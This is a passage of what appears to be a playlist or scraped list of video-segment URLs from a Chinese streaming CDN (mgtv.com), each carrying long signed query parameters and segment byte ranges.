d=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7B911169DD5DD524D6FC7740DD3D05B3_150080_160080_410_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/AE34FB0BAC5347793EE7AC2F2700A46B_160080_170080_598_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJ
vqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4328B081C0E710CF384CE5141EB7C4B9_170080_180080_801_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/865C02476E1EAE2E085CBF99C52381B0_180080_190080_616_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7
JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D5AFD85E64726A53DB719B8F65436F56_190080_200080_449_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/BBCF999507E6969212B2273A1ED359B8_200080_210080_767_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/3DB8FA9A210D4E622AFC0576C5248CCF_210080_220080_1842_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oayg
q80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/9912ACE4C1A079D29C4BAADCC66C3360_220080_230080_1872_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7D349749B62AC7CC7CD15D2CAC5BC328_230080_240080_866_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vq
m-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/BCCBCF357A161C0FFB1077EF151ACD80_240080_250080_1876_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/CCAE03BE2E7DC3107B000D5FA87D3241_250080_260079_666_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/398CECCEEB051A7E6515FF0ACB6CD36E_260079_270080_1244_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18f
GhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7D1C108D6F9ED7F95FE6CFDED732B380_270080_280080_1437_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/11FFEEF34FA954EE2F9A984006A390D9_280080_290080_1994_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K
-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/6438BED6D771EAC0CDF54B9E891460EF_290080_300080_583_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/51C8822A761F00104AFD198F71265623_300080_310080_425_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/6531649F40255F4C6A1FDD005920E297_310080_320080_1030_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZax
vUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/2429C24A14E10CF1C8BE1257628D7382_320080_330080_965_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0468DFF9BE24361388E3CB14A4C31BE2_330080_340080_994_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJa
PwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E45C59558833E06896D6D9AE0EF7BA15_340080_350080_715_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C8E7A56078AE6BECBA1B5A3AA680441A_350080_360080_627_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/83CD51118435ADE2034022A99F35DD41_360080_370080_795_v02_mp4.ts?arange=0&pm=WD~Uye